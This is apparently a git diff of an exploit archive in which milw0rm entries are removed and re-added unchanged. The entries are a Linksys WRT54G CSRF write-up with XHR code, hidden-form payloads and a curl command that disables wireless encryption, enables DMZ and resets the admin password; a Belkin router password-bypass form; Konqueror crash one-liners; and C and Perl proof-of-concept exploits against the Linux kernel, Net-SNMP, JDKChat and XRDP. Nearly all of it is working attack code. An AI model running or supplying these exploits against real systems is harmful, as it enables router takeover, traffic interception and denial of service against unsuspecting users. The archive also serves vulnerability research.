+ +...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this +standard looking navigation link, e.g.: + +var xhr=false; +if(window.XMLHttpRequest) { + xhr=new XMLHttpRequest(); +} else if(window.ActiveXObject) { + xhr=new ActiveXObject("Microsoft.XMLHTTP"); +} +function xhrRequest() { + if(xhr) { + xhr.open("POST", "http://192.168.1.1/Security.tri", true); + xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); + xhr.onreadystatechange=function() { + if(xhr.readyState == 4 && xhr.status == 200) { + var success=xhr.responseText; + } + } + xhr.send("SecurityMode=0&layout=en"); + } +} + +The example above effectively disables all wireless encryption so that if you happen to live close +enough to this poor individual, it is your duty to pwn their wireless by enabling open access for +everybody in the neighborhood! Here's the URL for disabling wireless encryption: + +http://192.168.1.1/Security.tri?SecurityMode=0&layout=en + +++| An Alternative (without JavaScript) +---------------------- +You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + +NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent +looking methods of compromising your WRT54G. For example, user registration for a bulletin board or +forum system. The site must acquire a minimal amount of information in order to create the account +so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to +enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the +URL once again: + +http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en + +Again it is a different script processing the request on behalf of the router's internal operating +system, dmz.tri, but it still does not require authentication prior to changing the settings we wish +to change. 
All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.: + +
+ + + + + +...and add these values to their user registration page with standard username/password/e-mail fields... + + Username:
+ Password:
+ Confirm Password:
+ +
+ +...that can be found on traditional forums these days. The mark submits and exploits his/her own +router although they believe they are at least minimally technically savvy by using a combination of +technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms +we use to store the router configs are hidden, and the normal user registration forms are not, thus +it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has +detected that a potential attack is taking place it is likely too late as the mastermind behind +http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up +targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration +changes within 10 seconds, which is plenty of time for them to open another terminal and change the +administrative login to block our mark from changing their settings, e.g.: + +curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri + +Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ +monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords +via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the +router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. + +++| Conclusion +---------------------- +It is my intention in finalizing this document that the reader understands that the Linksys WRT54G +firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care +whether or not you have the level of privilege thought to be necessary for manipulating sensitive +objects. + +Thanks go to hw2B for suggesting I write all of this garbage out. 
+ +++| URLs +---------------------- +https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) +https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) +https://kinqpinz.info/lib/wrt54g/own2.txt (this document) +http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247) + +# milw0rm.com [2008-06-24] diff --git a/platforms/hardware/remote/6305.htm b/platforms/hardware/remote/6305.htm index c10bdce1d..3a3f164ec 100755 --- a/platforms/hardware/remote/6305.htm +++ b/platforms/hardware/remote/6305.htm @@ -1,190 +1,190 @@ - - - - -html code to bypass the webinterface password protection of the Belkin wireless G router + adsl2 modem.
- It worked on model F5D7632-4V6 with upgraded firmware 6.01.08.
-
-
- Change dns nameservers (ip's can't be the same)
- - - - - - - -
- - - - -
- -
-
-
-
- Clear log file
- -
-
-
- -
- Change time, pwd(if you have old pwd), remote management, UPnP:)
- and automatic firmware update (nice combined with DNS poisoning)
- - - - - - - - - - - - - - - - - - - - - - - - - - -
old password
- - -
new password, twice
- - - - -
login timeout (1-99 minutes)
- - - -
Time and Time Zone:
- daylight saving :
- - timezone(number)
- - - Enable Automatic Time Server Maintenance
- -
Primary Server - - -
Secondary Server - - - -
Primary Server + + +
Secondary Server + + + +
\n"' > kdie3.html -perl -e 'print "\n" . "
\n"' > kdie4.html -perl -e 'print "\n" . "\n"' > kdie7.html -perl -e 'print "\n" . "\n"' > kdie8.html - -# milw0rm.com [2008-10-08] +KDE's Konqueror & Color Attribute Love + +perl -e 'print "\n" . "\n"' > kdie.html +perl -e 'print "\n" . "
\n"' > kdie2.html +perl -e 'print "\n" . "
\n"' > kdie5.html -perl -e 'print "\n" . "\n"' > kdie6.html -perl -e 'print "\n" . "
\n"' > kdie3.html +perl -e 'print "\n" . "
\n"' > kdie4.html
+perl -e 'print "\n" . "\n"' > kdie7.html
+perl -e 'print "\n" . "\n"' > kdie8.html
+
+# milw0rm.com [2008-10-08]
diff --git a/platforms/linux/dos/6718.html b/platforms/linux/dos/6718.html
index 481331cd0..40efe395b 100755
--- a/platforms/linux/dos/6718.html
+++ b/platforms/linux/dos/6718.html
@@ -1,10 +1,10 @@
-
-
-
-
-
-# milw0rm.com [2008-10-10]
+
+
+
+
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/linux/dos/7091.c b/platforms/linux/dos/7091.c
index d8fee896a..67ced79e9 100755
--- a/platforms/linux/dos/7091.c
+++ b/platforms/linux/dos/7091.c
@@ -1,122 +1,122 @@
-#include
-#include
-#include
-#include
-#include
-#include
-
-static int own_child(int *us)
-{
- int pid;
- int s[2];
- struct msghdr mh;
- char crap[1024];
- struct iovec iov;
- struct cmsghdr *c;
- int *fd;
- int rc;
-
- pid = fork();
- if (pid == -1)
- err(1, "fork()");
-
- if (pid) {
- close(us[1]);
-
- return pid;
- }
-
- close(us[0]);
-
- memset(&mh, 0, sizeof(mh));
- iov.iov_base = "a";
- iov.iov_len = 1;
-
- mh.msg_iov = &iov;
- mh.msg_iovlen = 1;
- mh.msg_control = crap;
- mh.msg_controllen = sizeof(crap);
-
- c = CMSG_FIRSTHDR(&mh);
- assert(c);
-
- c->cmsg_level = SOL_SOCKET;
- c->cmsg_type = SCM_RIGHTS;
-
- fd = (int*) CMSG_DATA(c);
- assert(fd);
-
- c->cmsg_len = CMSG_LEN(sizeof(int));
- mh.msg_controllen = c->cmsg_len;
-
- while (1) {
- if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1)
- err(1, "socketpair()");
-
- *fd = s[0];
-
- rc = sendmsg(us[1], &mh, 0);
- if (rc == -1)
- err(1, "sendmsg()");
-
- if (rc != iov.iov_len)
- errx(1, "sent short");
-
- close(s[0]);
- close(us[1]);
- us[1] = s[1];
- }
-}
-
-static void own(void)
-{
- static int pid;
- static int us[2];
- char crap[1024];
- char morte[1024];
- struct cmsghdr *c;
- int rc;
- struct msghdr mh;
- struct iovec iov;
- int *fds;
-
- if (!pid) {
- if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1)
- err(1, "socketpair()");
- pid = own_child(us);
- }
-
- iov.iov_base = morte;
- iov.iov_len = sizeof(morte);
-
- memset(&mh, 0, sizeof(mh));
- mh.msg_iov = &iov;
- mh.msg_iovlen = 1;
- mh.msg_control = crap;
- mh.msg_controllen = sizeof(crap);
-
- rc = recvmsg(us[0], &mh, 0);
- if (rc == -1)
- err(1, "recvmsg()");
-
- if (rc == 0)
- errx(1, "EOF");
-
- c = CMSG_FIRSTHDR(&mh);
- assert(c);
- assert(c->cmsg_type == SCM_RIGHTS);
-
- fds = (int*) CMSG_DATA(c);
- assert(fds);
-
- close(us[0]);
- us[0] = *fds;
-}
-
-int main(int argc, char *argv[])
-{
- own();
- exit(0);
-}
-
-// milw0rm.com [2008-11-11]
+#include
+#include
+#include
+#include
+#include
+#include
+
+static int own_child(int *us)
+{
+ int pid;
+ int s[2];
+ struct msghdr mh;
+ char crap[1024];
+ struct iovec iov;
+ struct cmsghdr *c;
+ int *fd;
+ int rc;
+
+ pid = fork();
+ if (pid == -1)
+ err(1, "fork()");
+
+ if (pid) {
+ close(us[1]);
+
+ return pid;
+ }
+
+ close(us[0]);
+
+ memset(&mh, 0, sizeof(mh));
+ iov.iov_base = "a";
+ iov.iov_len = 1;
+
+ mh.msg_iov = &iov;
+ mh.msg_iovlen = 1;
+ mh.msg_control = crap;
+ mh.msg_controllen = sizeof(crap);
+
+ c = CMSG_FIRSTHDR(&mh);
+ assert(c);
+
+ c->cmsg_level = SOL_SOCKET;
+ c->cmsg_type = SCM_RIGHTS;
+
+ fd = (int*) CMSG_DATA(c);
+ assert(fd);
+
+ c->cmsg_len = CMSG_LEN(sizeof(int));
+ mh.msg_controllen = c->cmsg_len;
+
+ while (1) {
+ if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1)
+ err(1, "socketpair()");
+
+ *fd = s[0];
+
+ rc = sendmsg(us[1], &mh, 0);
+ if (rc == -1)
+ err(1, "sendmsg()");
+
+ if (rc != iov.iov_len)
+ errx(1, "sent short");
+
+ close(s[0]);
+ close(us[1]);
+ us[1] = s[1];
+ }
+}
+
+static void own(void)
+{
+ static int pid;
+ static int us[2];
+ char crap[1024];
+ char morte[1024];
+ struct cmsghdr *c;
+ int rc;
+ struct msghdr mh;
+ struct iovec iov;
+ int *fds;
+
+ if (!pid) {
+ if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1)
+ err(1, "socketpair()");
+ pid = own_child(us);
+ }
+
+ iov.iov_base = morte;
+ iov.iov_len = sizeof(morte);
+
+ memset(&mh, 0, sizeof(mh));
+ mh.msg_iov = &iov;
+ mh.msg_iovlen = 1;
+ mh.msg_control = crap;
+ mh.msg_controllen = sizeof(crap);
+
+ rc = recvmsg(us[0], &mh, 0);
+ if (rc == -1)
+ err(1, "recvmsg()");
+
+ if (rc == 0)
+ errx(1, "EOF");
+
+ c = CMSG_FIRSTHDR(&mh);
+ assert(c);
+ assert(c->cmsg_type == SCM_RIGHTS);
+
+ fds = (int*) CMSG_DATA(c);
+ assert(fds);
+
+ close(us[0]);
+ us[0] = *fds;
+}
+
+int main(int argc, char *argv[])
+{
+ own();
+ exit(0);
+}
+
+// milw0rm.com [2008-11-11]
diff --git a/platforms/linux/dos/7100.pl b/platforms/linux/dos/7100.pl
index 22d6d0f34..cdbdcd870 100755
--- a/platforms/linux/dos/7100.pl
+++ b/platforms/linux/dos/7100.pl
@@ -1,61 +1,61 @@
-#!usr/bin/perl -w
-
-################################################################################################################
-# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1,
-# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and
-# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).
-#
-# Refer:
-# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292
-# http://www.securityfocus.com/bid/29212/discuss
-#
-#
-# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
-# (say #!C:/Program Files/Perl/bin/perl -w)
-#
-# This was strictly written for educational purpose. Use it at your own risk.
-# Author will not bare any responsibility for any damages watsoever.
-#
-# Author: Praveen Darshanam
-# Email: praveen[underscore]recker[at]sify.com
-# Date: 11th November, 2008
-#
-# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible
-# For reliable security solutions please visit http://www.ipolicynetworks.com/
-#
-##################################################################################################################
-
-use Net::SNMP;
-
-printf("\nEnter the IP Adress of Vulnerable SNMP Manager Agent: ");
-$host_vulnerable = ;
-$port = 161;
-#default SNMP port
-$community = "D" x 5000;
-
-($session, $error) = Net::SNMP->session(
- -hostname => $host_vulnerable,
- -port => $port,
- -community => $community,
- -maxmsgsize => 7000,
- );
- if (!defined($session))
- {
- printf("ERROR: %s.\n", $error);
- exit 1;
- }
-
-$sysUpTime = '1.3.6.1.2.1.1.3.0';
-$snmp_mal_request = $session->get_request(
- -varbindlist => [$sysUpTime],
- );
-
- if (!defined($snmp_mal_request)) {
- printf("ERROR: %s.\n", $session->error);
- $session->close;
- exit 1;
- }
-
-$session->close;
-
-# milw0rm.com [2008-11-12]
+#!usr/bin/perl -w
+
+################################################################################################################
+# Buffer overflow in the __snprint_value function in snmp_get in Net-SNMP 5.1.4, 5.2.4, and 5.4.1,
+# as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service (crash) and
+# possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair (AVP).
+#
+# Refer:
+# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2292
+# http://www.securityfocus.com/bid/29212/discuss
+#
+#
+# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
+# (say #!C:/Program Files/Perl/bin/perl -w)
+#
+# This was strictly written for educational purpose. Use it at your own risk.
+# Author will not bare any responsibility for any damages watsoever.
+#
+# Author: Praveen Darshanam
+# Email: praveen[underscore]recker[at]sify.com
+# Date: 11th November, 2008
+#
+# NOTE: Thanks to all my colleagues at iPolicy Networks for making this possible
+# For reliable security solutions please visit http://www.ipolicynetworks.com/
+#
+##################################################################################################################
+
+use Net::SNMP;
+
+printf("\nEnter the IP Adress of Vulnerable SNMP Manager Agent: ");
+$host_vulnerable = ;
+$port = 161;
+#default SNMP port
+$community = "D" x 5000;
+
+($session, $error) = Net::SNMP->session(
+ -hostname => $host_vulnerable,
+ -port => $port,
+ -community => $community,
+ -maxmsgsize => 7000,
+ );
+ if (!defined($session))
+ {
+ printf("ERROR: %s.\n", $error);
+ exit 1;
+ }
+
+$sysUpTime = '1.3.6.1.2.1.1.3.0';
+$snmp_mal_request = $session->get_request(
+ -varbindlist => [$sysUpTime],
+ );
+
+ if (!defined($snmp_mal_request)) {
+ printf("ERROR: %s.\n", $session->error);
+ $session->close;
+ exit 1;
+ }
+
+$session->close;
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/linux/dos/7150.html b/platforms/linux/dos/7150.html
index 71e747a40..1a98c48ea 100755
--- a/platforms/linux/dos/7150.html
+++ b/platforms/linux/dos/7150.html
@@ -1,26 +1,26 @@
-
-
-
-# milw0rm.com [2008-11-18]
+
+
+
+# milw0rm.com [2008-11-18]
diff --git a/platforms/linux/dos/815.c b/platforms/linux/dos/815.c
index e7c7ae85d..1cbf8f1a0 100755
--- a/platforms/linux/dos/815.c
+++ b/platforms/linux/dos/815.c
@@ -119,6 +119,6 @@ main ( int argc, char *argv[] )
 start ( s );
 close ( s );
 return ( 0 );
-}
-
-// milw0rm.com [2005-02-12]
+}
+
+// milw0rm.com [2005-02-12]
diff --git a/platforms/linux/dos/8205.pl b/platforms/linux/dos/8205.pl
index 3c77eeaa8..b26a02b43 100755
--- a/platforms/linux/dos/8205.pl
+++ b/platforms/linux/dos/8205.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-#
-# Title: JDKChat v1.5 Remote Integer Overflow PoC
-#
-# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
-# Users can connect to it through a simple tcp client like telnet.
-#
-# WebSite : http://www.jdkoftinoff.com/
-#
-# ---------------------------- Demo ---------------------------------
-# aleks@tux ~ $ telnet 192.168.0.1 7777
-# Trying 192.168.0.1...
-# Connected to 192.168.0.1.
-# Escape character is '^]'.
-# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
-# http://www.jdkoftinoff.com/
-# and modified by Aditya Godbole (urwithaditya@gmx.net)
-# Commands available:
-# /who -- (list all users along with their connection numbers)
-# /exit -- (exit chat room)
-# /local -- (toggle local mode for your telnet session)
-# /[connection number] message -- (send private message to user at
-# specified connection number)
-#
-#
-# JDKCHAT: Aleks just entered the room.
-# JDKCHAT: Users = Aleks:0
-# Aleks >
-#
-#
-# // And after we run the PoC :
-#
-# JDKCHAT: PwNzOr just entered the room.
-# Aleks >Connection closed by foreign host.
-# aleks@tux ~ $
-#
-# ---------------------------- /Demo --------------------------------
-#
-#
-# Vulnerability discovered by n3tpr0b3 & LiquidWorm
-#
-# n3tpr0b3 [AT] gmail [.] com
-#
-# 12.03.2009
-#
-
-use IO::Socket;
-
-if ($#ARGV != 1) {
- print "
- JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- # Usage : jdkchat_poc.pl SrvIP SrvPort #
- # Greetz to LiquidWorm #
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
- exit;
-}
-
-my $dupsa = new IO::Socket::INET (
- PeerAddr => "$ARGV[0]",
- PeerPort => "$ARGV[1]",
- Proto => "tcp"
- )
- or die "Could not connect to $ARGV[0]: $!\n";
-
-sleep 1;
-print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
-print "#--> Loged on t3h JDKChat server...\n";
-sleep 1;
-print "#--> Sending our evil command... \n";
-sleep 2;
-print $dupsa "\x2f\x2d\x31\x0d";
-close($dupsa);
-print "#--> Server pwned... \n";
-
-# milw0rm.com [2009-03-12]
+#!/usr/bin/perl
+#
+# Title: JDKChat v1.5 Remote Integer Overflow PoC
+#
+# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
+# Users can connect to it through a simple tcp client like telnet.
+#
+# WebSite : http://www.jdkoftinoff.com/
+#
+# ---------------------------- Demo ---------------------------------
+# aleks@tux ~ $ telnet 192.168.0.1 7777
+# Trying 192.168.0.1...
+# Connected to 192.168.0.1.
+# Escape character is '^]'.
+# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
+# http://www.jdkoftinoff.com/
+# and modified by Aditya Godbole (urwithaditya@gmx.net)
+# Commands available:
+# /who -- (list all users along with their connection numbers)
+# /exit -- (exit chat room)
+# /local -- (toggle local mode for your telnet session)
+# /[connection number] message -- (send private message to user at
+# specified connection number)
+#
+#
+# JDKCHAT: Aleks just entered the room.
+# JDKCHAT: Users = Aleks:0
+# Aleks >
+#
+#
+# // And after we run the PoC :
+#
+# JDKCHAT: PwNzOr just entered the room.
+# Aleks >Connection closed by foreign host.
+# aleks@tux ~ $
+#
+# ---------------------------- /Demo --------------------------------
+#
+#
+# Vulnerability discovered by n3tpr0b3 & LiquidWorm
+#
+# n3tpr0b3 [AT] gmail [.] com
+#
+# 12.03.2009
+#
+
+use IO::Socket;
+
+if ($#ARGV != 1) {
+ print "
+ JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
+ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ # Usage : jdkchat_poc.pl SrvIP SrvPort #
+ # Greetz to LiquidWorm #
+ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
+ exit;
+}
+
+my $dupsa = new IO::Socket::INET (
+ PeerAddr => "$ARGV[0]",
+ PeerPort => "$ARGV[1]",
+ Proto => "tcp"
+ )
+ or die "Could not connect to $ARGV[0]: $!\n";
+
+sleep 1;
+print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
+print "#--> Loged on t3h JDKChat server...\n";
+sleep 1;
+print "#--> Sending our evil command... \n";
+sleep 2;
+print $dupsa "\x2f\x2d\x31\x0d";
+close($dupsa);
+print "#--> Server pwned... \n";
+
+# milw0rm.com [2009-03-12]
diff --git a/platforms/linux/dos/8469.c b/platforms/linux/dos/8469.c
index d1a86a915..40ab27f43 100755
--- a/platforms/linux/dos/8469.c
+++ b/platforms/linux/dos/8469.c
@@ -1,3208 +1,3208 @@ -/* - - XRDP <= 0.4.1 pre-auth remote PoC exploit. (xrdp.sourceforge.net) - -******************************************************************************** - - 01:59:56 root@crateria:~/xrdp# gcc -w -lssl -lX11 xrdp-poc.c -o xrdp-poc - 02:00:29 root@crateria:~/xrdp# ./xrdp-poc 10.0.0.13 - - [=] Connected to 10.0.0.13 - [=] Hit CTRL-C if the progress bar stops. - - Be patient! It takes about a minute, the RDP packets - need to be sent spaced apart or the daemon discards them. - - [=] Progress: ******************************************************* - [=] Check port 3389 on target host. It should be offline. - - ~/~ - - [root@norfair xrdp]# cat /etc/issue - CentOS release 4.7 (Final) - [root@norfair xrdp]# ./xrdp -nodaemon - Segmentation fault (core dumped) - -******************************************************************************** - - Quick description of the exploit: - - This is a PoC remote exploit for the XRDP vulnerability found by Hamid Ebadi. - XRDP 0.4.1 is the latest version at the time of this writing. This is *almost* - a really cool exploit, but execution control is difficult to achieve because: - - 1 - The XRDP daemon only accepts valid rdp scancodes as input. (ie, not ASCII - codes, but rdp scancodes that are later translated to ASCII after validation). - This isn't a huge problem. I was able write alpha-numeric shellcode onto the - stack. However, I wasn't able to find any alpha-numeric return addresses we - can use to overwrite the saved EIP, at least on the distros I examined - (Ubuntu 8.10 and CentOS 4.7). There may be distros where this isn't the case. - - 2 - On systems with gcc versions greater than 3.4 (realistically most Linux - boxes today, Ubuntu 8.10 uses 4.3.2), gcc's -O2 option (which xrdp's - Makefile includes) enables _FORTIFY_SOURCE checks, which stop you cold. On - older distros like CentOS 4.7 (gcc 3.4.6), we can successfully overwrite EIP: - - #7 0x61616161 in ?? () - #8 0x61616161 in ?? 
() - #9 0xb7f59200 in ?? () - #10 0x0804db1e in xrdp_bitmap_def_proc (self=Cannot access memory - at address 0x61616169) at xrdp_bitmap.c:1482 - Previous frame inner to this frame (corrupt stack?) - - #0 0x61616161 in ?? () - (gdb) i r - eax 0x0 0 - ecx 0x8fda860 150841440 - edx 0x97d858 9951320 - ebx 0x61616161 1633771873 - esp 0xb7f59208 0xb7f59208 - ebp 0x61616161 0x61616161 - esi 0x61616161 1633771873 - edi 0x61616161 1633771873 - eip 0x61616161 0x61616161 - - But due to the alpha-numeric requirements for the return address, again, - no dice. Most of the code itself was taken from rdesktop, by Matthew Chapman. - Basically we hack rdesktop to bypass all X-windows interaction, then in - rdp_send_scancode(), we are able to build our payload. If you manage to find - an alternate way to control EIP, drop me a line. - joewalko@gmail.com - -******************************************************************************** -*/ - -#include /* inet_addr */ -#include -#include -#include /* errno */ -#include /* save licence uses it. 
*/ -#include /* open */ -#include -#include /* gethostbyname */ -#include /* sockaddr_in */ -#include /* TCP_NODELAY */ -#include -#include -#include -#include -#include /* getpwuid */ -#include /* va_list va_start va_end */ -#include -#include -#include -#include /* socket connect */ -#include /* socket connect setsockopt */ -#include /* stat */ -#include /* gettimeofday */ -#include /* timeval */ -#include /* times */ -#include /* sockaddr_un */ -#include /* tcgetattr tcsetattr */ -#include -#include /* read close getuid getgid getpid getppid gethostname */ -#include /* select read write close */ -#include -#include -#include - - -//Begin typedefs and structs -typedef int BOOL; -#ifndef True -#define True (1) -#define False (0) -#endif -typedef unsigned char uint8; -typedef signed char sint8; -typedef unsigned short uint16; -typedef signed short sint16; -typedef unsigned int uint32; -typedef signed int sint32; -typedef void *HBITMAP; -typedef void *HGLYPH; -typedef void *HCOLOURMAP; -typedef void *HCURSOR; - -typedef struct _COLOURENTRY -{ - uint8 red; - uint8 green; - uint8 blue; - -} -COLOURENTRY; - -typedef struct _COLOURMAP -{ - uint16 ncolours; - COLOURENTRY *colours; - -} -COLOURMAP; - -typedef struct _BOUNDS -{ - uint16 left; - uint16 top; - uint16 right; - uint16 bottom; - -} -BOUNDS; - -typedef struct _PEN -{ - uint8 style; - uint8 width; - uint8 colour; - -} -PEN; - -typedef struct _BRUSH -{ - uint8 xorigin; - uint8 yorigin; - uint8 style; - uint8 pattern[8]; - -} -BRUSH; - -typedef struct _FONTGLYPH -{ - sint16 offset; - sint16 baseline; - uint16 width; - uint16 height; - HBITMAP pixmap; - -} -FONTGLYPH; - -typedef struct _DATABLOB -{ - void *data; - int size; - -} -DATABLOB; - -typedef struct _key_translation -{ - uint8 scancode; - uint16 modifiers; -} -key_translation; - -/* TCP port for Remote Desktop Protocol */ -#define TCP_PORT_RDP 3389 - -/* ISO PDU codes */ -enum ISO_PDU_CODE -{ - ISO_PDU_CR = 0xE0, /* Connection Request */ - ISO_PDU_CC = 0xD0, 
/* Connection Confirm */ - ISO_PDU_DR = 0x80, /* Disconnect Request */ - ISO_PDU_DT = 0xF0, /* Data */ - ISO_PDU_ER = 0x70 /* Error */ -}; - -/* MCS PDU codes */ -enum MCS_PDU_TYPE -{ - MCS_EDRQ = 1, /* Erect Domain Request */ - MCS_DPUM = 8, /* Disconnect Provider Ultimatum */ - MCS_AURQ = 10, /* Attach User Request */ - MCS_AUCF = 11, /* Attach User Confirm */ - MCS_CJRQ = 14, /* Channel Join Request */ - MCS_CJCF = 15, /* Channel Join Confirm */ - MCS_SDRQ = 25, /* Send Data Request */ - MCS_SDIN = 26 /* Send Data Indication */ -}; - -#define MCS_CONNECT_INITIAL 0x7f65 -#define MCS_CONNECT_RESPONSE 0x7f66 -#define BER_TAG_BOOLEAN 1 -#define BER_TAG_INTEGER 2 -#define BER_TAG_OCTET_STRING 4 -#define BER_TAG_RESULT 10 -#define MCS_TAG_DOMAIN_PARAMS 0x30 -#define MCS_GLOBAL_CHANNEL 1003 - -/* RDP secure transport constants */ -#define SEC_RANDOM_SIZE 32 -#define SEC_MODULUS_SIZE 64 -#define SEC_PADDING_SIZE 8 -#define SEC_EXPONENT_SIZE 4 -#define SEC_CLIENT_RANDOM 0x0001 -#define SEC_ENCRYPT 0x0008 -#define SEC_LOGON_INFO 0x0040 -#define SEC_LICENCE_NEG 0x0080 -#define SEC_TAG_SRV_INFO 0x0c01 -#define SEC_TAG_SRV_CRYPT 0x0c02 -#define SEC_TAG_SRV_3 0x0c03 -#define SEC_TAG_CLI_INFO 0xc001 -#define SEC_TAG_CLI_CRYPT 0xc002 -#define SEC_TAG_PUBKEY 0x0006 -#define SEC_TAG_KEYSIG 0x0008 -#define SEC_RSA_MAGIC 0x31415352 /* RSA1 */ - -/* RDP licensing constants */ -#define LICENCE_TOKEN_SIZE 10 -#define LICENCE_HWID_SIZE 20 -#define LICENCE_SIGNATURE_SIZE 16 -#define LICENCE_TAG_DEMAND 0x0201 -#define LICENCE_TAG_AUTHREQ 0x0202 -#define LICENCE_TAG_ISSUE 0x0203 -#define LICENCE_TAG_REISSUE 0x0204 -#define LICENCE_TAG_PRESENT 0x0212 -#define LICENCE_TAG_REQUEST 0x0213 -#define LICENCE_TAG_AUTHRESP 0x0215 -#define LICENCE_TAG_RESULT 0x02ff -#define LICENCE_TAG_USER 0x000f -#define LICENCE_TAG_HOST 0x0010 - -/* RDP PDU codes */ -enum RDP_PDU_TYPE -{ - RDP_PDU_DEMAND_ACTIVE = 1, - RDP_PDU_CONFIRM_ACTIVE = 3, - RDP_PDU_DEACTIVATE = 6, - RDP_PDU_DATA = 7 -}; - -enum 
RDP_DATA_PDU_TYPE -{ - RDP_DATA_PDU_UPDATE = 2, - RDP_DATA_PDU_CONTROL = 20, - RDP_DATA_PDU_POINTER = 27, - RDP_DATA_PDU_INPUT = 28, - RDP_DATA_PDU_SYNCHRONISE = 31, - RDP_DATA_PDU_BELL = 34, - RDP_DATA_PDU_LOGON = 38, - RDP_DATA_PDU_FONT2 = 39 -}; - -enum RDP_CONTROL_PDU_TYPE -{ - RDP_CTL_REQUEST_CONTROL = 1, - RDP_CTL_GRANT_CONTROL = 2, - RDP_CTL_DETACH = 3, - RDP_CTL_COOPERATE = 4 -}; - -enum RDP_UPDATE_PDU_TYPE -{ - RDP_UPDATE_ORDERS = 0, - RDP_UPDATE_BITMAP = 1, - RDP_UPDATE_PALETTE = 2, - RDP_UPDATE_SYNCHRONIZE = 3 -}; - -enum RDP_POINTER_PDU_TYPE -{ - RDP_POINTER_MOVE = 3, - RDP_POINTER_COLOR = 6, - RDP_POINTER_CACHED = 7 -}; - -enum RDP_INPUT_DEVICE -{ - RDP_INPUT_SYNCHRONIZE = 0, - RDP_INPUT_CODEPOINT = 1, - RDP_INPUT_VIRTKEY = 2, - RDP_INPUT_SCANCODE = 4, - RDP_INPUT_MOUSE = 0x8001 -}; - -/* Device flags */ -#define KBD_FLAG_RIGHT 0x0001 -#define KBD_FLAG_EXT 0x0100 -#define KBD_FLAG_QUIET 0x1000 -#define KBD_FLAG_DOWN 0x4000 -#define KBD_FLAG_UP 0x8000 - -/* These are for synchronization; not for keystrokes */ -#define KBD_FLAG_SCROLL 0x0001 -#define KBD_FLAG_NUMLOCK 0x0002 -#define KBD_FLAG_CAPITAL 0x0004 - -/* See T.128 */ -#define RDP_KEYPRESS 0 -#define RDP_KEYRELEASE (KBD_FLAG_DOWN | KBD_FLAG_UP) -#define MOUSE_FLAG_MOVE 0x0800 -#define MOUSE_FLAG_BUTTON1 0x1000 -#define MOUSE_FLAG_BUTTON2 0x2000 -#define MOUSE_FLAG_BUTTON3 0x4000 -#define MOUSE_FLAG_BUTTON4 0x0280 -#define MOUSE_FLAG_BUTTON5 0x0380 -#define MOUSE_FLAG_DOWN 0x8000 - -/* Raster operation masks */ -#define ROP2_S(rop3) (rop3 & 0xf) -#define ROP2_P(rop3) ((rop3 & 0x3) | ((rop3 & 0x30) >> 2)) -#define ROP2_COPY 0xc -#define ROP2_XOR 0x6 -#define ROP2_AND 0x8 -#define ROP2_NXOR 0x9 -#define ROP2_OR 0xe -#define MIX_TRANSPARENT 0 -#define MIX_OPAQUE 1 -#define TEXT2_VERTICAL 0x04 -#define TEXT2_IMPLICIT_X 0x20 - -/* RDP capabilities */ -#define RDP_CAPSET_GENERAL 1 -#define RDP_CAPLEN_GENERAL 0x18 -#define OS_MAJOR_TYPE_UNIX 4 -#define OS_MINOR_TYPE_XSERVER 7 -#define RDP_CAPSET_BITMAP 2 
